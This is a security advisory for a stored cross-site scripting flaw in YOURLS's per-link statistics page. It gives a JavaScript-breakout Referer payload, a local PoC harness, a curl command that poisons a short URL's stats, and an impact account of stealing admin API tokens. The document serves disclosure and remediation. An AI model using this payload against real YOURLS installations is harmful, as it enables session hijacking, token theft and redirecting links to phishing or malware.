GHSA-5h77-88j3-r659: XSS
Summary
YOURLS stores the HTTP Referer header for short URL redirects and later renders aggregated referrer domains in the per-link statistics page. An unauthenticated attacker can send a crafted Referer header to any existing short URL. When an authenticated administrator or stats-page viewer opens that short URL's statistics page, the crafted referrer is embedded into Google Charts JavaScript without JavaScript-string escaping, causing stored cross-site scripting.
This is reachable in default private installations when authenticated users view stats, and in documented configurations where YOURLSPRIVATEINFOS is set to false to make statistics pages public.
Details
The vulnerable source-to-sink path is:
text HTTP Referer header -> yourlsgetreferrer() -> yourlssanitizeurlsafe() -> yourlslogredirect() -> log table referrer column -> yourls-infos.php referrer aggregation -> yourlsgetdomain() -> yourlsstatspie() -> yourlsgooglearraytodatatable() -> inline JavaScript
Relevant code:
- includes/functions.php:240-243: yourlsgetreferrer() reads $SERVER['HTTPREFERER'], calls yourlssanitizeurlsafe(), and truncates the result to 200 bytes. - includes/functions.php:294-307: yourlsredirectshorturl() calls yourlslogredirect() before redirecting the visitor. - includes/functions.php:516-545: yourlslogredirect() stores the sanitized referrer in the log table. - yourls-infos.php:60-82: the statistics page reads logged referrers and groups them by yourlsgetdomain($row->referrer). - yourls-infos.php:493-498: the statistics page passes referrer domains to yourlsstatspie(). - includes/functions-infos.php:338-355: yourlsgooglearraytodatatable() manually concatenates labels into JavaScript as ['$label', ...] without escaping single quotes, backslashes, or other JavaScript string metacharacters. - includes/functions-formatting.php:141-143 and includes/functions-formatting.php:555-609: yourlssanitizeurlsafe() removes some unsafe characters and CRLF sequences, but still permits the characters needed for JavaScript-string breakout, including ', [, ], ,, and parentheses.
A crafted referrer host such as:
text x',1],['marker',alert(1)],['z.tld
survives sanitization when used in a URL like:
text http://x',1],['marker',alert(1)],['z.tld/path
It is then rendered into chart JavaScript like:
javascript var data = google.visualization.arrayToDataTable([ ['x',1],['marker',alert(1)],['z.tld',1] ]);
The alert(1) call is only a benign proof marker. An attacker could execute arbitrary JavaScript in the stats viewer's browser context.
PoC
The following local harness was run against commit c3fc8e2370d240403c17c2e4a70e1e234759a5b3. It exercises YOURLS' real URL sanitizer, domain extraction, and yourlsstatspie() chart rendering path, then executes the generated chart script in Node with stubs for Google Charts and alert().
sh docker run --rm --network none -v "$PWD:/repo:ro" -w /repo phpmyadmin:5.2.1 php -d displaystartuperrors=0 -r ' define("IDNADEFAULT",0); define("INTLIDNAVARIANTUTS46",1); function yourlsaddaction(){ } function yourlsdoaction(){ } function yourlsapplyfilter($tag,$value){ return $value; } function yourlsgetprotocol($url){ pregmatch("!^[a-zA-Z][a-zA-Z0-9+.-]+:(//)?!", $url, $m); return isset($m[0]) ? $m[0] : ""; } function yourlsisallowedprotocol($url,$protocols=[]){ if(!$protocols){ global $yourlsallowedprotocols; $protocols=$yourlsallowedprotocols; } return inarray(yourlsgetprotocol($url), $protocols); } if(!functionexists("idntoutf8")){ function idntoutf8($domain,$flags=0,$variant=0){ return $domain; } } require "includes/vendor/autoload.php"; require "includes/functions-kses.php"; yourlsksesinit(); require "includes/functions-formatting.php"; require "includes/functions-infos.php"; $ref="http://x\x27,1],[\x27marker\x27,alert(1)],[\x27z.tld/path"; $san=substr(yourlssanitizeurlsafe($ref),0,200); $host=yourlsgetdomain($san); obstart(); yourlsstatspie([$host=>1,"benign.example"=>1,"another.example"=>1], 5, "440x220", "stattabsourceref"); $html=obgetclean(); pregmatch("#<script[^>]>(.?)</script>#s", $html, $m); $js="global.pwned=0; function alert(x){global.pwned=x}; const google={setOnLoadCallback:(fn)=>fn(),visualization:{arrayToDataTable:(x)=>x,PieChart:function(){this.draw=function(){}}}}; document={getElementById:(id)=>({id})}; ".$m[1]."; console.log(\x27san=\x27+".jsonencode($san)."); console.log(\x27host=\x27+".jsonencode($host)."); console.log(\x27pwned=\x27+global.pwned);"; echo $js; ' 2>/dev/null > /tmp/yourls-xss-harness.js && node /tmp/yourls-xss-harness.js
Observed output:
text san=http://x',1],['marker',alert(1)],['z.tld/path host=x',1],['marker',alert(1)],['z.tld pwned=1
A request that would poison statistics for an existing short URL in a local YOURLS instance is:
sh curl -H "Referer: http://x',1],['marker',alert(1)],['z.tld/path" \ http://localhost/<existing-keyword>
Then view the affected short URL's stats page:
text http://localhost/<existing-keyword>+
The payload is short enough to survive YOURLS' 200-byte referrer truncation and still executes when additional benign referrers are present.
Impact
Beyond executing arbitrary JavaScript in the victim's browser, the stored XSS runs in the authenticated YOURLS origin and can perform privileged same-origin actions.
In a private installation, an attacker can use the victim administrator's session to fetch admin pages, read embedded CSRF nonces, and call admin AJAX endpoints to create, edit, or delete short URLs. This allows replacing existing short-link destinations with attacker-controlled phishing or malware URLs, deleting links, and modifying link metadata.
The XSS can also fetch /admin/tools.php and read the victim's secret API signature token. That token authenticates passwordless API requests and can be reused outside the victim's browser session to create short URLs and query URL/global statistics until the underlying secret changes.
Confidentiality impact includes access to admin-visible URL inventory and metadata such as long URLs, titles, creator IP addresses, timestamps, click counts, referrer statistics, and the API signature token. Integrity impact includes persistent modification of short-link destinations and deletion/creation of links.
Credits - Thai Son Dinh from VinSOC Labs (R&D)
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
composer/yourls/yourlsto a version that resolves this vulnerability.Fixed in 1.10.4
Event History
Frequently Asked Questions
Who can trigger the vulnerable data flow, and who is affected when it executes?
Any unauthenticated attacker can submit a crafted HTTP Referer header by requesting an existing short URL. The payload executes when an authenticated administrator or statistics-page viewer opens that link's statistics page; in configurations with YOURLS_PRIVATE_INFOS set to false, public statistics-page visitors can also trigger it.
Is a default private installation affected?
Yes. The issue is reachable in default private installations when authenticated users view statistics pages.
What interaction is required for exploitation?
The attacker must target an existing short URL and cause a user to open that short URL's statistics page after the crafted Referer has been logged. The attacker does not need authentication, but execution requires a stats-page view.
How can I determine whether a deployment may contain a payload?
Review the stored referrer values in the log table and the aggregated referrer domains shown for affected short URLs' statistics pages. Crafted Referer values are recorded during redirects and later rendered in the statistics page's inline Google Charts JavaScript.